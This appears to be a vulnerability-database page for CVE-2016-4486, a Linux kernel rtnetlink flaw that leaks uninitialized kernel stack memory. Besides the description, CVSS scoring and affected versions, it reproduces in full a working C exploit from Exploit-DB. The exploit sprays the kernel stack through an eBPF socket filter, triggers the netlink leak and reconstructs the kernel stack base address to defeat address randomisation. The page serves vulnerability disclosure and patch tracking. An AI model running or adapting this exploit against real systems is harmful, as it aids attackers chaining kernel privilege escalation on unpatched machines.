CVE-2016-4486 : Detail

CVE-2016-4486

3.3
/
Low
A01-Broken Access Control
0.04%V3
Local
2016-05-23
08h00 +00:00
2018-12-20
09h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The rtnl_fill_link_ifmap function in net/core/rtnetlink.c in the Linux kernel before 4.5.5 does not initialize a certain data structure, which allows local users to obtain sensitive information from kernel stack memory by reading a Netlink message.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Metrics

Metrics Score Severity CVSS Vector Source
V3.0 3.3 LOW CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

Low

The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

Low

There is some loss of confidentiality. Access to some restricted information is obtained, but the attacker does not have control over what information is obtained, or the amount or kind of loss is constrained. The information disclosure does not cause a direct, serious loss to the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

None

There is no impact to availability within the impacted component.

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

[email protected]
V2 2.1 AV:L/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 46006

Publication date : 2018-12-18 23h00 +00:00
Author : Jinbum Park
EDB Verified : No

/* * [ Briefs ] * - CVE-2016-4486 has discovered and reported by Kangjie Lu. * - This is local exploit against the CVE-2016-4486. * * [ Tested version ] * - Distro : Ubuntu 16.04 * - Kernel version : 4.4.0-21-generic * - Arch : x86_64 * * [ Prerequisites ] * - None * * [ Goal ] * - Leak kernel stack base address of current process by exploiting CVE-2016-4486. * * [ Exploitation ] * - CVE-2016-4486 leaks 32-bits arbitrary kernel memory from uninitialized stack. * - This exploit gets 61-bits stack base address among the 64-bits full address. * remaining 3-bits is not leaked because of limitation of ebpf. * - Full exploitation are performed as follows. * * 1. Spraying kernel stack as kernel stack address via running ebpf program. * - We can spray stack up to 512-bytes by running ebpf program. * - After this step, memory to be leaked will be filled with kernel stack address. * 2. Trigger CVE-2016-4486 to leak 4-bytes which is low part of stack address. * - After this step, stack address : 0xffff8800????????; (? is unknown address yet.) * 3. Leak high 4-bytes of stack address. The leaking is done as one-by-one bit. why one-by-one? * - CVE-2016-4486 allows to leak 4-bytes only, so that we always get low 4-bytes of stack address. * - Then, How to overcome this challenge?? The one of possible answer is that * do operation on high-4bytes with carefully selected value which changes low-4bytes. * For example, Assume that real stack address is 0xffff880412340000; * and, do sub operation. ==> 0xffff880412340000 - 0x0000000012360000 (selected value); * The result will be "0xffff8803....." ==> Yap! low 4-bytes are changed!! and We can see this! * The result makes us to know that high 4-bytes are smaller than 0x12360000; * Then, We can keep going with smaller value. * - The algorithm is quite similar to quick-search. * 4. Unfortunately, ebpf program limitation stops us to leak full 64-bits. * - 3-bits (bit[16], bit[15], bit[14]) are not leaked. * - But, Since 3-bit is not sufficient randomness, It's very valuable for attacker. * Bonus) Why do I use compat_sendmsg() instead of normal sendmsg()? * - When I did spraying stack with normal sendmsg(), I couldn't spray up to memory to be leaked. * - If I use compat-sendmsg(), The execution path will be different from normal sendmsg(). * This makes me to spray it more far. * * [ Run exploit ] * - $ gcc poc.c -o poc * - $ ./poc * .... * .... * leak stack address range : * -----from : ffff88007f7e0000 * --------to : ffff88007f7fc000 * (Since we can get 61-bit address, Print the possible address range out.) * * [ Contact ] * - [email protected] * - github.com/jinb-park */ #include <asm/types.h> #include <linux/netlink.h> #include <linux/rtnetlink.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <unistd.h> #include <stdint.h> #include <sys/syscall.h> #include <asm/unistd_64.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/ioctl.h> #include <linux/bpf.h> #include <linux/filter.h> #define GPLv2 "GPL v2" #define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) #define INTERFACE_INDEX (0) #define LEAK_OFFSET (28) /* * BPF-based stack sprayer */ /* registers */ /* caller-saved: r0..r5 */ #define BPF_REG_ARG1 BPF_REG_1 #define BPF_REG_ARG2 BPF_REG_2 #define BPF_REG_ARG3 BPF_REG_3 #define BPF_REG_ARG4 BPF_REG_4 #define BPF_REG_ARG5 BPF_REG_5 #define BPF_REG_CTX BPF_REG_6 #define BPF_REG_FP BPF_REG_10 #define BPF_MOV32_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn) { \ .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_STX_ADD_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_XADD | BPF_SIZE(SIZE),\ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_MOV64_IMM(DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_EXIT_INSN() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 }) #define BPF_MOV64_REG(DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_MOV | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) #define BPF_ALU64_IMM(OP, DST, IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM }) #define BPF_ALU64_REG(OP, DST, SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 }) int bpf_(int cmd, union bpf_attr *attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int prog_load(struct bpf_insn *insns, size_t insns_count) { char verifier_log[100000]; union bpf_attr create_prog_attrs = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = insns_count, .insns = (uint64_t)insns, .license = (uint64_t)GPLv2, .log_level = 1, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log }; int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); int errno_ = errno; errno = errno_; if (progfd == -1) { printf("bpf prog load error\n"); exit(-1); } return progfd; } int create_socket_by_socketpair(int *progfd) { int socks[2]; if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, socks)) { printf("socketpair error\n"); exit(-1); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, progfd, sizeof(int))) { printf("setsockopt error\n"); exit(-1); } return socks[1]; } int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) { int progfd = prog_load(insns, insns_count); return create_socket_by_socketpair(&progfd); } #define NR_sendmsg_32 370 // for 32-bit typedef unsigned int compat_uptr_t; typedef int compat_int_t; typedef unsigned int compat_size_t; typedef unsigned int compat_uint_t; struct compat_msghdr { compat_uptr_t msg_name; /* void * */ compat_int_t msg_namelen; compat_uptr_t msg_iov; /* struct compat_iovec * */ compat_size_t msg_iovlen; compat_uptr_t msg_control; /* void * */ compat_size_t msg_controllen; compat_uint_t msg_flags; }; struct compat_iovec { compat_uptr_t iov_base; compat_size_t iov_len; }; int sendmsg_by_legacy_call(int fd, unsigned int msg, int flags) { int r = -1; asm volatile ( "push %%rax\n" "push %%rbx\n" "push %%rcx\n" "push %%rdx\n" "push %%rsi\n" "push %%rdi\n" "mov %1, %%eax\n" "mov %2, %%ebx\n" "mov %3, %%ecx\n" "mov %4, %%edx\n" "int $0x80\n" "mov %%eax, %0\n" "pop %%rdi\n" "pop %%rsi\n" "pop %%rdx\n" "pop %%rcx\n" "pop %%rbx\n" "pop %%rax\n" : "=r" (r) : "r"(NR_sendmsg_32), "r"(fd), "r"(msg), "r"(flags) : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi" ); return r; } #define COMPAT_SENDMSG void trigger_proc(int sockfd) { #ifdef COMPAT_SENDMSG struct compat_msghdr *msg = NULL; struct compat_iovec *iov = NULL; #else struct msghdr *msg = NULL; struct iovec *iov = NULL; #endif char *buf = NULL; int r; // allocate under-32-bit address for compat syscall msg = mmap(0x70000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); if (msg == MAP_FAILED) { printf("mmap error : %d, %s\n", errno, strerror(errno)); exit(0); } buf = mmap(0x90000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); if (buf == MAP_FAILED) { printf("mmap error : %d, %s\n", errno, strerror(errno)); exit(0); } iov = mmap(0xb0000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); if (buf == MAP_FAILED) { printf("mmap error : %d, %s\n", errno, strerror(errno)); exit(0); } #ifdef COMPAT_SENDMSG iov->iov_base = (compat_uptr_t)buf; #else iov->iov_base = buf; #endif iov->iov_len = 128; msg->msg_name = NULL; msg->msg_namelen = 0; #ifdef COMPAT_SENDMSG msg->msg_iov = (compat_uptr_t)iov; #else msg->msg_iov = iov; #endif msg->msg_iovlen = 1; msg->msg_control = NULL; msg->msg_controllen = 0; msg->msg_flags = 0; #ifdef COMPAT_SENDMSG r = sendmsg_by_legacy_call(sockfd, (unsigned int)msg, 0); #else r = sendmsg(sockfd, msg, 0); #endif if (r < 0) { printf("sendmsg error, %d, %s\n", errno, strerror(errno)); exit(-1); } } int sockfds = -1; void stack_spraying_by_bpf(unsigned long val) { int r; struct bpf_insn stack_spraying_insns[] = { BPF_MOV64_REG(BPF_REG_3, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -val), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -368), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -376), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -384), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -392), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -400), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -408), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -416), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -424), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -432), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -440), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -448), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -456), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -464), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -472), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -480), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -488), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -496), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -504), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -512), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; sockfds = create_filtered_socket_fd(stack_spraying_insns, ARRSIZE(stack_spraying_insns)); if (sockfds < 0) return; trigger_proc(sockfds); close(sockfds); //sleep(1); } /* 28byte, 32byte including padding struct rtnl_link_ifmap { __u64 mem_start; __u64 mem_end; __u64 base_addr; __u16 irq; __u8 dma; __u8 port; };*/ // rtnl_fill_link_ifmap <-- rtnl_fill_ifinfo (symbol) struct { struct nlmsghdr nh; struct ifinfomsg ifm; char attrbuf[512]; } req; // Ubuntu 4.4.0-21-generic #define RANGE_MIN_MASK ~((1<<16) | (1<<15) | (1<<14)) // and #define RANGE_MAX_MASK ((1<<16) | (1<<15) | (1<<14)) // or int main(int argc, char **argv) { unsigned char buf[65535]; unsigned char map_buf[36] = {0,}; struct nlmsghdr *nl_msg_ptr; struct ifinfomsg *inf_msg_ptr; struct rtnl_link_ifmap *map_ptr; struct rtattr *rta_ptr; int size, len, attr_len, offset; int progfd; unsigned int sub_val = 0; unsigned int leak_value; unsigned long leak_full_stack = 0; unsigned int low_stack = 0; int i; for (i=0; i<16; i++) { int rtnetlink_sk = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE); memset(&req, 0, sizeof(req)); req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); req.nh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST; req.nh.nlmsg_type = RTM_GETLINK; req.nh.nlmsg_seq = 1; req.ifm.ifi_family = AF_UNSPEC; req.ifm.ifi_index = INTERFACE_INDEX; req.ifm.ifi_change = 0xffffffff; if (i == 0) sub_val = 0; else sub_val += (1 << (32 - i)); stack_spraying_by_bpf((unsigned long)sub_val); if (send(rtnetlink_sk, &req, req.nh.nlmsg_len, 0) < 0) { printf("send error\n"); goto out; } while (1) { if ((size = recv(rtnetlink_sk, buf, sizeof(buf), 0)) < 0) { fprintf(stderr, "ERROR recv(): %s\n", strerror(errno)); goto out; } for (nl_msg_ptr = (struct nlmsghdr *)buf; size > (int)sizeof(*nl_msg_ptr);) { len = nl_msg_ptr->nlmsg_len; if (nl_msg_ptr->nlmsg_type == NLMSG_ERROR) { printf("NLMSG_ERROR\n"); goto out; } else if (nl_msg_ptr->nlmsg_type == NLMSG_DONE) break; if (!NLMSG_OK(nl_msg_ptr, (unsigned int)size)) { printf("Not OK\n"); goto out; } attr_len = IFLA_PAYLOAD(nl_msg_ptr); inf_msg_ptr = (struct ifinfomsg *)NLMSG_DATA(nl_msg_ptr); rta_ptr = (struct rtattr *)IFLA_RTA(inf_msg_ptr); for (; RTA_OK(rta_ptr, attr_len); rta_ptr = RTA_NEXT(rta_ptr, attr_len)) { if (rta_ptr->rta_type == IFLA_MAP) { if (rta_ptr->rta_len != sizeof(map_buf)) { printf("wrong size\n"); goto out; } memcpy(map_buf, RTA_DATA(rta_ptr), sizeof(map_buf)); map_ptr = &map_buf; leak_value = *(unsigned int *)(map_buf + LEAK_OFFSET); printf("leak_value : %08x\n", leak_value); break; } } size -= NLMSG_ALIGN(len); nl_msg_ptr = (struct nlmsghdr *)((char *)nl_msg_ptr + NLMSG_ALIGN(len)); } break; } if (low_stack == 0) low_stack = leak_value; else if (leak_value != low_stack) sub_val &= (~(1 << (32 - i))); // clear bit memcpy((unsigned char *)&leak_full_stack + 4, &low_stack, 4); memcpy((unsigned char *)&leak_full_stack, &sub_val, 4); printf("[try-%d] stack address : %lx\n", i, leak_full_stack); out: close(rtnetlink_sk); } printf("=======================================================================\n"); printf("leak stack address range : \n"); printf("-----from : %lx\n", leak_full_stack & RANGE_MIN_MASK); printf("--------to : %lx\n", leak_full_stack | RANGE_MAX_MASK); printf("======================================================================\n"); return 0; }

Products Mentioned

Configuraton 0

Novell>>Suse_linux_enterprise_software_development_kit >> Version 11.0

Novell>>Suse_linux_enterprise_software_development_kit >> Version 12.0

Novell>>Suse_linux_enterprise_software_development_kit >> Version 12.0

Novell>>Suse_linux_enterprise_debuginfo >> Version 11.0

Novell>>Suse_linux_enterprise_desktop >> Version 12.0

Novell>>Suse_linux_enterprise_desktop >> Version 12.0

Novell>>Suse_linux_enterprise_live_patching >> Version 12.0

    Novell>>Suse_linux_enterprise_module_for_public_cloud >> Version 12.0

      Novell>>Suse_linux_enterprise_real_time_extension >> Version 12.0

        Novell>>Suse_linux_enterprise_server >> Version 11.0

          Novell>>Suse_linux_enterprise_server >> Version 11.0

          Novell>>Suse_linux_enterprise_server >> Version 12.0

          Novell>>Suse_linux_enterprise_server >> Version 12.0

          Novell>>Suse_linux_enterprise_workstation_extension >> Version 12.0

          Novell>>Suse_linux_enterprise_workstation_extension >> Version 12.0

          Configuraton 0

          Canonical>>Ubuntu_linux >> Version 12.04

          Canonical>>Ubuntu_linux >> Version 14.04

          Canonical>>Ubuntu_linux >> Version 15.10

          Canonical>>Ubuntu_linux >> Version 16.04

          Configuraton 0

          Linux>>Linux_kernel >> Version To (including) 4.5.4

          References

          http://www.ubuntu.com/usn/USN-3006-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.ubuntu.com/usn/USN-3004-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.ubuntu.com/usn/USN-3001-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.securityfocus.com/bid/90051
          Tags : vdb-entry, x_refsource_BID
          http://www.ubuntu.com/usn/USN-3005-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          https://www.exploit-db.com/exploits/46006/
          Tags : exploit, x_refsource_EXPLOIT-DB
          http://www.ubuntu.com/usn/USN-2997-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.ubuntu.com/usn/USN-3000-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.debian.org/security/2016/dsa-3607
          Tags : vendor-advisory, x_refsource_DEBIAN
          http://www.ubuntu.com/usn/USN-3002-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.ubuntu.com/usn/USN-2996-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.ubuntu.com/usn/USN-2989-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.ubuntu.com/usn/USN-3007-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.ubuntu.com/usn/USN-3003-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.ubuntu.com/usn/USN-2998-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://www.openwall.com/lists/oss-security/2016/05/04/27
          Tags : mailing-list, x_refsource_MLIST